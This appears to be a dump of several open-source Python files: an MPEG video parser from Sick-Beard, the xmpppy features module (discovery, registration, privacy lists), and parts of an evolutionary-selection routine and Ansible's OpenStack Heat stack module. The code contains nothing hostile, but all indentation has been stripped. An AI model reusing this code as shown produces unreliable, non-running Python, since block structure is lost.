dna_tensor = torch.index_select(remaining, 1, idx)
return elites, dna_tensor
def _initialize_selection(self, keep_elites_rate):
sorted_dna_tensor = self.get_dna_tensor()
elite_count = 0
if keep_elites_rate > 0:
if keep_elites_rate < 1:
elite_count = max(round(self._owner.population_size * keep_elites_rate), 1)
else:
elite_count = min(self._owner.population_size, keep_elites_rate)
if elite_count == 0:
return None, sorted_dna_tensor, self._owner.population_size
elites = sorted_dna_tensor[:, 0:elite_count]
remaining = sorted_dna_tensor[:, elite_count:]
remaining_size = self._owner.population_size - elite_count
return elites, remaining, remaining_size | apache-2.0 |
tquizzle/Sick-Beard | lib/hachoir_parser/video/mpeg_video.py | 90 | 22604 | """
Moving Picture Experts Group (MPEG) video version 1 and 2 parser.
Information:
- http://www.mpucoder.com/DVD/
- http://dvd.sourceforge.net/dvdinfo/
- http://www.mit.jyu.fi/mweber/leffakone/software/parsempegts/
- http://homepage.mac.com/rnc/EditMpegHeaderIFO.html
- http://standards.iso.org/ittf/PubliclyAvailableStandards/c025029_ISO_IEC_TR_11172-5_1998(E)_Software_Simulation.zip
This is a sample encoder/decoder implementation for MPEG-1.
Author: Victor Stinner
Creation date: 15 september 2006
"""
from lib.hachoir_parser import Parser
from lib.hachoir_parser.audio.mpeg_audio import MpegAudioFile
from lib.hachoir_core.field import (FieldSet,
FieldError, ParserError,
Bit, Bits, Bytes, RawBits, PaddingBits, NullBits,
UInt8, UInt16,
RawBytes, PaddingBytes,
Enum)
from lib.hachoir_core.endian import BIG_ENDIAN
from lib.hachoir_core.stream import StringInputStream
from lib.hachoir_core.text_handler import textHandler, hexadecimal
class FragmentGroup:
def __init__(self, parser):
self.items = []
self.parser = parser
self.args = {}
def add(self, item):
self.items.append(item)
def createInputStream(self):
# FIXME: Use lazy stream creation
data = []
for item in self.items:
if 'rawdata' in item:
data.append( item["rawdata"].value )
data = "".join(data)
# FIXME: Use smarter code to send arguments
tags = {"class": self.parser, "args": self.args}
tags = tags.iteritems()
return StringInputStream(data, "<fragment group>", tags=tags)
class CustomFragment(FieldSet):
def __init__(self, parent, name, size, parser, description=None, group=None):
FieldSet.__init__(self, parent, name, description, size=size)
if not group:
group = FragmentGroup(parser)
self.group = group
self.group.add(self)
def createFields(self):
yield RawBytes(self, "rawdata", self.size//8)
def _createInputStream(self, **args):
return self.group.createInputStream()
class Timestamp(FieldSet):
static_size = 36
def createValue(self):
return (self["c"].value << 30) + (self["b"].value << 15) + self["a"].value
def createFields(self):
yield Bits(self, "c", 3)
yield Bit(self, "sync[]") # =True
yield Bits(self, "b", 15)
yield Bit(self, "sync[]") # =True
yield Bits(self, "a", 15)
yield Bit(self, "sync[]") # =True
class SCR(FieldSet):
static_size = 35
def createFields(self):
yield Bits(self, "scr_a", 3)
yield Bit(self, "sync[]") # =True
yield Bits(self, "scr_b", 15)
yield Bit(self, "sync[]") # =True
yield Bits(self, "scr_c", 15)
class PackHeader(FieldSet):
def createFields(self):
if self.stream.readBits(self.absolute_address, 2, self.endian) == 1:
# MPEG version 2
yield Bits(self, "sync[]", 2)
yield SCR(self, "scr")
yield Bit(self, "sync[]")
yield Bits(self, "scr_ext", 9)
yield Bit(self, "sync[]")
yield Bits(self, "mux_rate", 22)
yield Bits(self, "sync[]", 2)
yield PaddingBits(self, "reserved", 5, pattern=1)
yield Bits(self, "stuffing_length", 3)
count = self["stuffing_length"].value
if count:
yield PaddingBytes(self, "stuffing", count, pattern="\xff")
else:
# MPEG version 1
yield Bits(self, "sync[]", 4)
yield Bits(self, "scr_a", 3)
yield Bit(self, "sync[]")
yield Bits(self, "scr_b", 15)
yield Bit(self, "sync[]")
yield Bits(self, "scr_c", 15)
yield Bits(self, "sync[]", 2)
yield Bits(self, "mux_rate", 22)
yield Bit(self, "sync[]")
def validate(self):
if self["mux_rate"].value == 0:
return "Invalid mux rate"
sync0 = self["sync[0]"]
if (sync0.size == 2 and sync0.value == 1):
# MPEG2
pass
if not self["sync[1]"].value \
or not self["sync[2]"].value \
or self["sync[3]"].value != 3:
return "Invalid synchronisation bits"
elif (sync0.size == 4 and sync0.value == 2):
# MPEG1
if not self["sync[1]"].value \
or not self["sync[2]"].value \
or self["sync[3]"].value != 3 \
or not self["sync[4]"].value:
return "Invalid synchronisation bits"
else:
return "Unknown version"
return True
class SystemHeader(FieldSet):
def createFields(self):
yield Bits(self, "marker[]", 1)
yield Bits(self, "rate_bound", 22)
yield Bits(self, "marker[]", 1)
yield Bits(self, "audio_bound", 6)
yield Bit(self, "fixed_bitrate")
yield Bit(self, "csps", description="Constrained system parameter stream")
yield Bit(self, "audio_lock")
yield Bit(self, "video_lock")
yield Bits(self, "marker[]", 1)
yield Bits(self, "video_bound", 5)
length = self['../length'].value-5
if length:
yield RawBytes(self, "raw[]", length)
class defaultParser(FieldSet):
def createFields(self):
yield RawBytes(self, "data", self["../length"].value)
class Padding(FieldSet):
def createFields(self):
yield PaddingBytes(self, "data", self["../length"].value)
class VideoExtension2(FieldSet):
def createFields(self):
yield Bit(self, "sync[]") # =True
yield Bits(self, "ext_length", 7)
yield NullBits(self, "reserved[]", 8)
size = self["ext_length"].value
if size:
yield RawBytes(self, "ext_bytes", size)
class VideoExtension1(FieldSet):
def createFields(self):
yield Bit(self, "has_private")
yield Bit(self, "has_pack_lgth")
yield Bit(self, "has_pack_seq")
yield Bit(self, "has_pstd_buffer")
yield Bits(self, "sync[]", 3) # =7
yield Bit(self, "has_extension2")
if self["has_private"].value:
yield RawBytes(self, "private", 16)
if self["has_pack_lgth"].value:
yield UInt8(self, "pack_lgth")
if self["has_pack_seq"].value:
yield Bit(self, "sync[]") # =True
yield Bits(self, "pack_seq_counter", 7)
yield Bit(self, "sync[]") # =True
yield Bit(self, "mpeg12_id")
yield Bits(self, "orig_stuffing_length", 6)
if self["has_pstd_buffer"].value:
yield Bits(self, "sync[]", 2) # =1
yield Enum(Bit(self, "pstd_buffer_scale"),
{True: "128 bytes", False: "1024 bytes"})
yield Bits(self, "pstd_size", 13)
class VideoSeqHeader(FieldSet):
ASPECT=["forbidden", "1.0000 (VGA etc.)", "0.6735",
"0.7031 (16:9, 625line)", "0.7615", "0.8055",
"0.8437 (16:9, 525line)", "0.8935",
"0.9157 (CCIR601, 625line)", "0.9815", "1.0255", "1.0695",
"1.0950 (CCIR601, 525line)", "1.1575", "1.2015", "reserved"]
FRAMERATE=["forbidden", "23.976 fps", "24 fps", "25 fps", "29.97 fps",
"30 fps", "50 fps", "59.94 fps", "60 fps"]
def createFields(self):
yield Bits(self, "width", 12)
yield Bits(self, "height", 12)
yield Enum(Bits(self, "aspect", 4), self.ASPECT)
yield Enum(Bits(self, "frame_rate", 4), self.FRAMERATE)
yield Bits(self, "bit_rate", 18, "Bit rate in units of 50 bytes")
yield Bits(self, "sync[]", 1) # =1
yield Bits(self, "vbv_size", 10, "Video buffer verifier size, in units of 16768")
yield Bit(self, "constrained_params_flag")
yield Bit(self, "has_intra_quantizer")
if self["has_intra_quantizer"].value:
for i in range(64):
yield Bits(self, "intra_quantizer[]", 8)
yield Bit(self, "has_non_intra_quantizer")
if self["has_non_intra_quantizer"].value:
for i in range(64):
yield Bits(self, "non_intra_quantizer[]", 8)
class GroupStart(FieldSet):
def createFields(self):
yield Bit(self, "drop_frame")
yield Bits(self, "time_hh", 5)
yield Bits(self, "time_mm", 6)
yield PaddingBits(self, "time_pad[]", 1)
yield Bits(self, "time_ss", 6)
yield Bits(self, "time_ff", 6)
yield Bit(self, "closed_group")
yield Bit(self, "broken_group")
yield PaddingBits(self, "pad[]", 5)
class PacketElement(FieldSet):
def createFields(self):
yield Bits(self, "sync[]", 2) # =2
if self["sync[0]"].value != 2:
raise ParserError("Unknown video elementary data")
yield Bits(self, "is_scrambled", 2)
yield Bits(self, "priority", 1)
yield Bit(self, "alignment")
yield Bit(self, "is_copyrighted")
yield Bit(self, "is_original")
yield Bit(self, "has_pts", "Presentation Time Stamp")
yield Bit(self, "has_dts", "Decode Time Stamp")
yield Bit(self, "has_escr", "Elementary Stream Clock Reference")
yield Bit(self, "has_es_rate", "Elementary Stream rate")
yield Bit(self, "dsm_trick_mode")
yield Bit(self, "has_copy_info")
yield Bit(self, "has_prev_crc", "If True, previous PES packet CRC follows")
yield Bit(self, "has_extension")
yield UInt8(self, "size")
# Time stamps
if self["has_pts"].value:
yield Bits(self, "sync[]", 4) # =2, or 3 if has_dts=True
yield Timestamp(self, "pts")
if self["has_dts"].value:
if not(self["has_pts"].value):
raise ParserError("Invalid PTS/DTS values")
yield Bits(self, "sync[]", 4) # =1
yield Timestamp(self, "dts")
if self["has_escr"].value:
yield Bits(self, "sync[]", 2) # =0
yield SCR(self, "escr")
if self["has_es_rate"].value:
yield Bit(self, "sync[]") # =True
yield Bits(self, "es_rate", 14) # in units of 50 bytes/second
yield Bit(self, "sync[]") # =True
if self["has_copy_info"].value:
yield Bit(self, "sync[]") # =True
yield Bits(self, "copy_info", 7)
if self["has_prev_crc"].value:
yield textHandler(UInt16(self, "prev_crc"), hexadecimal)
# --- Extension ---
if self["has_extension"].value:
yield VideoExtension1(self, "extension")
if self["extension/has_extension2"].value:
yield VideoExtension2(self, "extension2")
class VideoExtension(FieldSet):
EXT_TYPE = {1:'Sequence',2:'Sequence Display',8:'Picture Coding'}
def createFields(self):
yield Enum(Bits(self, "ext_type", 4), self.EXT_TYPE)
ext_type=self['ext_type'].value
if ext_type==1:
# Sequence extension
yield Bits(self, 'profile_and_level', 8)
yield Bit(self, 'progressive_sequence')
yield Bits(self, 'chroma_format', 2)
yield Bits(self, 'horiz_size_ext', 2)
yield Bits(self, 'vert_size_ext', 2)
yield Bits(self, 'bit_rate_ext', 12)
yield Bits(self, 'pad[]', 1)
yield Bits(self, 'vbv_buffer_size_ext', 8)
yield Bit(self, 'low_delay')
yield Bits(self, 'frame_rate_ext_n', 2)
yield Bits(self, 'frame_rate_ext_d', 5)
elif ext_type==2:
# Sequence Display extension
yield Bits(self, 'video_format', 3)
yield Bit(self, 'color_desc_present')
if self['color_desc_present'].value:
yield UInt8(self, 'color_primaries')
yield UInt8(self, 'transfer_characteristics')
yield UInt8(self, 'matrix_coeffs')
yield Bits(self, 'display_horiz_size', 14)
yield Bits(self, 'pad[]', 1)
yield Bits(self, 'display_vert_size', 14)
yield NullBits(self, 'pad[]', 3)
elif ext_type==8:
yield Bits(self, 'f_code[0][0]', 4, description="forward horizontal")
yield Bits(self, 'f_code[0][1]', 4, description="forward vertical")
yield Bits(self, 'f_code[1][0]', 4, description="backward horizontal")
yield Bits(self, 'f_code[1][1]', 4, description="backward vertical")
yield Bits(self, 'intra_dc_precision', 2)
yield Bits(self, 'picture_structure', 2)
yield Bit(self, 'top_field_first')
yield Bit(self, 'frame_pred_frame_dct')
yield Bit(self, 'concealment_motion_vectors')
yield Bit(self, 'q_scale_type')
yield Bit(self, 'intra_vlc_format')
yield Bit(self, 'alternate_scan')
yield Bit(self, 'repeat_first_field')
yield Bit(self, 'chroma_420_type')
yield Bit(self, 'progressive_frame')
yield Bit(self, 'composite_display')
if self['composite_display'].value:
yield Bit(self, 'v_axis')
yield Bits(self, 'field_sequence', 3)
yield Bit(self, 'sub_carrier')
yield Bits(self, 'burst_amplitude', 7)
yield Bits(self, 'sub_carrier_phase', 8)
yield NullBits(self, 'pad[]', 2)
else:
yield NullBits(self, 'pad[]', 6)
else:
yield RawBits(self, "raw[]", 4)
class VideoPicture(FieldSet):
CODING_TYPE = ["forbidden","intra-coded (I)",
"predictive-coded (P)",
"bidirectionally-predictive-coded (B)",
"dc intra-coded (D)", "reserved",
"reserved", "reserved"]
def createFields(self):
yield Bits(self, "temporal_ref", 10)
yield Enum(Bits(self, "coding_type", 3), self.CODING_TYPE)
yield Bits(self, "vbv_delay", 16)
if self['coding_type'].value in (2,3):
# predictive coding
yield Bit(self, 'full_pel_fwd_vector')
yield Bits(self, 'forward_f_code', 3)
if self['coding_type'].value == 3:
# bidi predictive coding
yield Bit(self, 'full_pel_back_vector')
yield Bits(self, 'backward_f_code', 3)
yield Bits(self, "padding", 8-(self.current_size % 8))
class VideoSlice(FieldSet):
def createFields(self):
yield Bits(self, "quantizer_scale", 5)
start=self.absolute_address+self.current_size+3
pos=self.stream.searchBytes('\0\0\1',start,start+1024*1024*8) # seek forward by at most 1MB
if pos is None: pos=self.root.size
yield RawBits(self, "data", pos-start+3)
class VideoChunk(FieldSet):
tag_info = {
0x00: ("pict_start[]", VideoPicture, "Picture start"),
0xB2: ("data_start[]", None, "Data start"),
0xB3: ("seq_hdr[]", VideoSeqHeader,"Sequence header"),
0xB4: ("seq_err[]", None, "Sequence error"),
0xB5: ("ext_start[]", VideoExtension,"Extension start"),
0xB7: ("seq_end[]", None, "Sequence end"),
0xB8: ("group_start[]", GroupStart, "Group start"),
}
def __init__(self, *args):
FieldSet.__init__(self, *args)
tag = self["tag"].value
if tag in self.tag_info:
self._name, self.parser, self._description = self.tag_info[tag]
if not self.parser:
self.parser = defaultParser
elif 0x01 <= tag <= 0xaf:
self._name, self.parser, self._description = ('slice[]', VideoSlice, 'Picture slice')
else:
self.parser = defaultParser
def createFields(self):
yield Bytes(self, "sync", 3)
yield textHandler(UInt8(self, "tag"), hexadecimal)
if self.parser and self['tag'].value != 0xb7:
yield self.parser(self, "content")
class VideoStream(Parser):
endian = BIG_ENDIAN
def createFields(self):
while self.current_size < self.size:
pos=self.stream.searchBytes('\0\0\1',self.current_size,self.current_size+1024*1024*8) # seek forward by at most 1MB
if pos is not None:
padsize = pos-self.current_size
if padsize:
yield PaddingBytes(self, "pad[]", padsize//8)
yield VideoChunk(self, "chunk[]")
class Stream(FieldSet):
def createFields(self):
padding=0
position=0
while True:
next=ord(self.parent.stream.readBytes(self.absolute_address+self.current_size+position, 1))
if next == 0xff:
padding+=1
position+=8
elif padding:
yield PaddingBytes(self, "pad[]", padding)
padding=None
position=0
elif 0x40 <= next <= 0x7f:
yield Bits(self, "scale_marker", 2) # 1
yield Bit(self, "scale")
scale=self['scale'].value
if scale:
scaleval=1024
else:
scaleval=128
yield textHandler(Bits(self, "size", 13), lambda field:str(field.value*scaleval))
elif 0x00 <= next <= 0x3f:
yield Bits(self, "ts_marker", 2) # 0
yield Bit(self, "has_pts")
yield Bit(self, "has_dts")
if self['has_pts'].value:
yield Timestamp(self, "pts")
if self['has_dts'].value:
yield PaddingBits(self, "pad[]", 4)
yield Timestamp(self, "dts")
if self.current_size % 8 == 4:
yield PaddingBits(self, "pad[]", 4)
break
elif 0x80 <= next <= 0xbf:
# MPEG-2 extension
yield PacketElement(self, "pkt")
break
else:
# 0xc0 - 0xfe: unknown
break
length = self["../length"].value - self.current_size//8
if length:
tag=self['../tag'].value
group=self.root.streamgroups[tag]
parname=self.parent._name
if parname.startswith('audio'):
frag = CustomFragment(self, "data", length*8, MpegAudioFile, group=group)
elif parname.startswith('video'):
frag = CustomFragment(self, "data", length*8, VideoStream, group=group)
else:
frag = CustomFragment(self, "data", length*8, None, group=group)
self.root.streamgroups[tag]=frag.group
yield frag
class Chunk(FieldSet):
ISO_END_CODE = 0xB9
tag_info = {
0xB9: ("end", None, "End"),
0xBA: ("pack_start[]", PackHeader, "Pack start"),
0xBB: ("system_start[]", SystemHeader, "System start"),
# streams
0xBD: ("private[]", Stream, "Private elementary"),
0xBE: ("padding[]", Stream, "Padding"),
# 0xC0 to 0xFE handled specially
0xFF: ("directory[]", Stream, "Program Stream Directory"),
}
def __init__(self, *args):
FieldSet.__init__(self, *args)
if not hasattr(self.root,'streamgroups'):
self.root.streamgroups={}
for tag in range(0xBC, 0x100):
self.root.streamgroups[tag]=None
tag = self["tag"].value
if tag in self.tag_info:
self._name, self.parser, self._description = self.tag_info[tag]
elif 0xBC <= tag <= 0xFF:
if 0xC0 <= tag < 0xE0:
# audio
streamid = tag-0xC0
self._name, self.parser, self._description = ("audio[%i][]"%streamid, Stream, "Audio Stream %i Packet"%streamid)
elif 0xE0 <= tag < 0xF0:
# video
streamid = tag-0xE0
self._name, self.parser, self._description = ("video[%i][]"%streamid, Stream, "Video Stream %i Packet"%streamid)
else:
self._name, self.parser, self._description = ("stream[]", Stream, "Data Stream Packet")
else:
self.parser = defaultParser
if not self.parser:
self.parser = defaultParser
elif self.parser != PackHeader and "length" in self:
self._size = (6 + self["length"].value) * 8
def createFields(self):
yield Bytes(self, "sync", 3)
yield textHandler(UInt8(self, "tag"), hexadecimal)
if self.parser:
if self.parser != PackHeader:
yield UInt16(self, "length")
if not self["length"].value:
return
yield self.parser(self, "content")
def createDescription(self):
return "Chunk: tag %s" % self["tag"].display
class MPEGVideoFile(Parser):
PARSER_TAGS = {
"id": "mpeg_video",
"category": "video",
"file_ext": ("mpeg", "mpg", "mpe", "vob"),
"mime": (u"video/mpeg", u"video/mp2p"),
"min_size": 12*8,
#TODO: "magic": xxx,
"description": "MPEG video, version 1 or 2"
}
endian = BIG_ENDIAN
version = None
def createFields(self):
while self.current_size < self.size:
pos=self.stream.searchBytes('\0\0\1',self.current_size,self.current_size+1024*1024*8) # seek forward by at most 1MB
if pos is not None:
padsize = pos-self.current_size
if padsize:
yield PaddingBytes(self, "pad[]", padsize//8)
chunk=Chunk(self, "chunk[]")
try:
# force chunk to be processed, so that CustomFragments are complete
chunk['content/data']
except: pass
yield chunk
def validate(self):
try:
pack = self[0]
except FieldError:
return "Unable to create first chunk"
if pack.name != "pack_start[0]":
return "Invalid first chunk"
if pack["sync"].value != "\0\0\1":
return "Invalid synchronisation"
return pack["content"].validate()
def getVersion(self):
if not self.version:
if self["pack_start[0]/content/sync[0]"].size == 2:
self.version = 2
else:
self.version = 1
return self.version
def createDescription(self):
if self.getVersion() == 2:
return "MPEG-2 video"
else:
return "MPEG-1 video"
| gpl-3.0 |
coderb0t/CouchPotatoServer | libs/xmpp/features.py | 199 | 8578 | ## features.py
##
## Copyright (C) 2003-2004 Alexey "Snake" Nezhdanov
##
## This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 2, or (at your option)
## any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
# $Id: features.py,v 1.25 2009/04/07 07:11:48 snakeru Exp $
"""
This module contains variable stuff that is not worth splitting into separate modules.
Here is:
DISCO client and agents-to-DISCO and browse-to-DISCO emulators.
IBR and password manager.
jabber:iq:privacy methods
All these methods takes 'disp' first argument that should be already connected
(and in most cases already authorised) dispatcher instance.
"""
from protocol import *
REGISTER_DATA_RECEIVED='REGISTER DATA RECEIVED'
### DISCO ### http://jabber.org/protocol/disco ### JEP-0030 ####################
### Browse ### jabber:iq:browse ### JEP-0030 ###################################
### Agents ### jabber:iq:agents ### JEP-0030 ###################################
def _discover(disp,ns,jid,node=None,fb2b=0,fb2a=1):
""" Try to obtain info from the remote object.
If remote object doesn't support disco fall back to browse (if fb2b is true)
and if it doesnt support browse (or fb2b is not true) fall back to agents protocol
(if gb2a is true). Returns obtained info. Used internally. """
iq=Iq(to=jid,typ='get',queryNS=ns)
if node: iq.setQuerynode(node)
rep=disp.SendAndWaitForResponse(iq)
if fb2b and not isResultNode(rep): rep=disp.SendAndWaitForResponse(Iq(to=jid,typ='get',queryNS=NS_BROWSE)) # Fallback to browse
if fb2a and not isResultNode(rep): rep=disp.SendAndWaitForResponse(Iq(to=jid,typ='get',queryNS=NS_AGENTS)) # Fallback to agents
if isResultNode(rep): return [n for n in rep.getQueryPayload() if isinstance(n, Node)]
return []
def discoverItems(disp,jid,node=None):
""" Query remote object about any items that it contains. Return items list. """
""" According to JEP-0030:
query MAY have node attribute
item: MUST HAVE jid attribute and MAY HAVE name, node, action attributes.
action attribute of item can be either of remove or update value."""
ret=[]
for i in _discover(disp,NS_DISCO_ITEMS,jid,node):
if i.getName()=='agent' and i.getTag('name'): i.setAttr('name',i.getTagData('name'))
ret.append(i.attrs)
return ret
def discoverInfo(disp,jid,node=None):
""" Query remote object about info that it publishes. Returns identities and features lists."""
""" According to JEP-0030:
query MAY have node attribute
identity: MUST HAVE category and name attributes and MAY HAVE type attribute.
feature: MUST HAVE var attribute"""
identities , features = [] , []
for i in _discover(disp,NS_DISCO_INFO,jid,node):
if i.getName()=='identity': identities.append(i.attrs)
elif i.getName()=='feature': features.append(i.getAttr('var'))
elif i.getName()=='agent':
if i.getTag('name'): i.setAttr('name',i.getTagData('name'))
if i.getTag('description'): i.setAttr('name',i.getTagData('description'))
identities.append(i.attrs)
if i.getTag('groupchat'): features.append(NS_GROUPCHAT)
if i.getTag('register'): features.append(NS_REGISTER)
if i.getTag('search'): features.append(NS_SEARCH)
return identities , features
### Registration ### jabber:iq:register ### JEP-0077 ###########################
def getRegInfo(disp,host,info={},sync=True):
""" Gets registration form from remote host.
You can pre-fill the info dictionary.
F.e. if you are requesting info on registering user joey than specify
info as {'username':'joey'}. See JEP-0077 for details.
'disp' must be connected dispatcher instance."""
iq=Iq('get',NS_REGISTER,to=host)
for i in info.keys(): iq.setTagData(i,info[i])
if sync:
resp=disp.SendAndWaitForResponse(iq)
_ReceivedRegInfo(disp.Dispatcher,resp, host)
return resp
else: disp.SendAndCallForResponse(iq,_ReceivedRegInfo, {'agent': host})
def _ReceivedRegInfo(con, resp, agent):
iq=Iq('get',NS_REGISTER,to=agent)
if not isResultNode(resp): return
df=resp.getTag('query',namespace=NS_REGISTER).getTag('x',namespace=NS_DATA)
if df:
con.Event(NS_REGISTER,REGISTER_DATA_RECEIVED,(agent, DataForm(node=df)))
return
df=DataForm(typ='form')
for i in resp.getQueryPayload():
if type(i)<>type(iq): pass
elif i.getName()=='instructions': df.addInstructions(i.getData())
else: df.setField(i.getName()).setValue(i.getData())
con.Event(NS_REGISTER,REGISTER_DATA_RECEIVED,(agent, df))
def register(disp,host,info):
""" Perform registration on remote server with provided info.
disp must be connected dispatcher instance.
Returns true or false depending on registration result.
If registration fails you can get additional info from the dispatcher's owner
attributes lastErrNode, lastErr and lastErrCode.
"""
iq=Iq('set',NS_REGISTER,to=host)
if type(info)<>type({}): info=info.asDict()
for i in info.keys(): iq.setTag('query').setTagData(i,info[i])
resp=disp.SendAndWaitForResponse(iq)
if isResultNode(resp): return 1
def unregister(disp,host):
""" Unregisters with host (permanently removes account).
disp must be connected and authorized dispatcher instance.
Returns true on success."""
resp=disp.SendAndWaitForResponse(Iq('set',NS_REGISTER,to=host,payload=[Node('remove')]))
if isResultNode(resp): return 1
def changePasswordTo(disp,newpassword,host=None):
""" Changes password on specified or current (if not specified) server.
disp must be connected and authorized dispatcher instance.
Returns true on success."""
if not host: host=disp._owner.Server
resp=disp.SendAndWaitForResponse(Iq('set',NS_REGISTER,to=host,payload=[Node('username',payload=[disp._owner.Server]),Node('password',payload=[newpassword])]))
if isResultNode(resp): return 1
### Privacy ### jabber:iq:privacy ### draft-ietf-xmpp-im-19 ####################
#type=[jid|group|subscription]
#action=[allow|deny]
def getPrivacyLists(disp):
""" Requests privacy lists from connected server.
Returns dictionary of existing lists on success."""
try:
dict={'lists':[]}
resp=disp.SendAndWaitForResponse(Iq('get',NS_PRIVACY))
if not isResultNode(resp): return
for list in resp.getQueryPayload():
if list.getName()=='list': dict['lists'].append(list.getAttr('name'))
else: dict[list.getName()]=list.getAttr('name')
return dict
except: pass
def getPrivacyList(disp,listname):
""" Requests specific privacy list listname. Returns list of XML nodes (rules)
taken from the server responce."""
try:
resp=disp.SendAndWaitForResponse(Iq('get',NS_PRIVACY,payload=[Node('list',{'name':listname})]))
if isResultNode(resp): return resp.getQueryPayload()[0]
except: pass
def setActivePrivacyList(disp,listname=None,typ='active'):
""" Switches privacy list 'listname' to specified type.
By default the type is 'active'. Returns true on success."""
if listname: attrs={'name':listname}
else: attrs={}
resp=disp.SendAndWaitForResponse(Iq('set',NS_PRIVACY,payload=[Node(typ,attrs)]))
if isResultNode(resp): return 1
def setDefaultPrivacyList(disp,listname=None):
""" Sets the default privacy list as 'listname'. Returns true on success."""
return setActivePrivacyList(disp,listname,'default')
def setPrivacyList(disp,list):
""" Set the ruleset. 'list' should be the simpleXML node formatted
according to RFC 3921 (XMPP-IM) (I.e. Node('list',{'name':listname},payload=[...]) )
Returns true on success."""
resp=disp.SendAndWaitForResponse(Iq('set',NS_PRIVACY,payload=[list]))
if isResultNode(resp): return 1
def delPrivacyList(disp,listname):
""" Deletes privacy list 'listname'. Returns true on success."""
resp=disp.SendAndWaitForResponse(Iq('set',NS_PRIVACY,payload=[Node('list',{'name':listname})]))
if isResultNode(resp): return 1
| gpl-3.0 |
StephenWeber/ansible | lib/ansible/modules/cloud/openstack/os_stack.py | 15 | 9214 | #!/usr/bin/python
#coding: utf-8 -*-
# (c) 2016, Mathieu Bultel <mbultel@redhat.com>
# (c) 2016, Steve Baker <sbaker@redhat.com>
#
# This module is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'version': '1.0'}
DOCUMENTATION = '''
---
module: os_stack
short_description: Add/Remove Heat Stack
extends_documentation_fragment: openstack
version_added: "2.2"
author: "Mathieu Bultel (matbu), Steve Baker (steveb)"
description:
- Add or Remove a Stack to an OpenStack Heat
options:
state:
description:
- Indicate desired state of the resource
choices: ['present', 'absent']
required: false
default: present
name:
description:
- Name of the stack that should be created, name could be char and digit, no space
required: true
template:
description:
- Path of the template file to use for the stack creation
required: false
default: None
environment:
description:
- List of environment files that should be used for the stack creation
required: false
default: None
parameters:
description:
- Dictionary of parameters for the stack creation
required: false
default: None
rollback:
description:
- Rollback stack creation
required: false
default: false
timeout:
description:
- Maximum number of seconds to wait for the stack creation
required: false
default: 3600
availability_zone:
description:
- Ignored. Present for backwards compatability
required: false
requirements:
- "python >= 2.6"
- "shade"
'''
EXAMPLES = '''
---
- name: create stack
ignore_errors: True
register: stack_create
os_stack:
name: "{{ stack_name }}"
state: present
template: "/path/to/my_stack.yaml"
environment:
- /path/to/resource-registry.yaml
- /path/to/environment.yaml
parameters:
bmc_flavor: m1.medium
bmc_image: CentOS
key_name: default
private_net: "{{ private_net_param }}"
node_count: 2
name: undercloud
image: CentOS
my_flavor: m1.large
external_net: "{{ external_net_param }}"
'''
RETURN = '''
id:
description: Stack ID.
type: string
sample: "97a3f543-8136-4570-920e-fd7605c989d6"
stack:
action:
description: Action, could be Create or Update.
type: string
sample: "CREATE"
creation_time:
description: Time when the action has been made.
type: string
sample: "2016-07-05T17:38:12Z"
description:
description: Description of the Stack provided in the heat template.
type: string
sample: "HOT template to create a new instance and networks"
id:
description: Stack ID.
type: string
sample: "97a3f543-8136-4570-920e-fd7605c989d6"
name:
description: Name of the Stack
type: string
sample: "test-stack"
identifier:
description: Identifier of the current Stack action.
type: string
sample: "test-stack/97a3f543-8136-4570-920e-fd7605c989d6"
links:
description: Links to the current Stack.
type: list of dict
sample: "[{'href': 'http://foo:8004/v1/7f6a/stacks/test-stack/97a3f543-8136-4570-920e-fd7605c989d6']"
outputs:
description: Output returned by the Stack.
type: list of dict
sample: "{'description': 'IP address of server1 in private network',
'output_key': 'server1_private_ip',
'output_value': '10.1.10.103'}"
parameters:
description: Parameters of the current Stack
type: dict
sample: "{'OS::project_id': '7f6a3a3e01164a4eb4eecb2ab7742101',
'OS::stack_id': '97a3f543-8136-4570-920e-fd7605c989d6',
'OS::stack_name': 'test-stack',
'stack_status': 'CREATE_COMPLETE',
'stack_status_reason': 'Stack CREATE completed successfully',
'status': 'COMPLETE',
'template_description': 'HOT template to create a new instance and networks',
'timeout_mins': 60,
'updated_time': null}"
'''
from time import sleep
from distutils.version import StrictVersion
try:
import shade
HAS_SHADE = True
except ImportError:
HAS_SHADE = False
def _create_stack(module, stack, cloud):
try:
stack = cloud.create_stack(module.params['name'],
template_file=module.params['template'],
environment_files=module.params['environment'],
timeout=module.params['timeout'],
wait=True,
rollback=module.params['rollback'],
**module.params['parameters'])
stack = cloud.get_stack(stack.id, None)
if stack.stack_status == 'CREATE_COMPLETE':
return stack
else:
return False
module.fail_json(msg = "Failure in creating stack: ".format(stack))
except shade.OpenStackCloudException as e:
module.fail_json(msg=str(e))
def _update_stack(module, stack, cloud):
try:
stack = cloud.update_stack(
module.params['name'],
template_file=module.params['template'],
environment_files=module.params['environment'],
timeout=module.params['timeout'],
rollback=module.params['rollback'],
wait=module.params['wait'],
**module.params['parameters'])
if stack['stack_status'] == 'UPDATE_COMPLETE':
return stack
else:
module.fail_json(msg = "Failure in updating stack: %s" %
stack['stack_status_reason'])
except shade.OpenStackCloudException as e:
module.fail_json(msg=str(e))
def _system_state_change(module, stack, cloud):
state = module.params['state']
if state == 'present':
if not stack:
return True
if state == 'absent' and stack:
return True
return False
def main():
argument_spec = openstack_full_argument_spec(
name=dict(required=True),
template=dict(default=None),
environment=dict(default=None, type='list'),
parameters=dict(default={}, type='dict'),
rollback=dict(default=False, type='bool'),
timeout=dict(default=3600, type='int'),
state=dict(default='present', choices=['absent', 'present']),
)
module_kwargs = openstack_module_kwargs()
module = AnsibleModule(argument_spec,
supports_check_mode=True,
**module_kwargs)
# stack API introduced in 1.8.0
if not HAS_SHADE or (StrictVersion(shade.__version__) < StrictVersion('1.8.0')):
module.fail_json(msg='shade 1.8.0 or higher is required for this module')
state = module.params['state']
name = module.params['name']
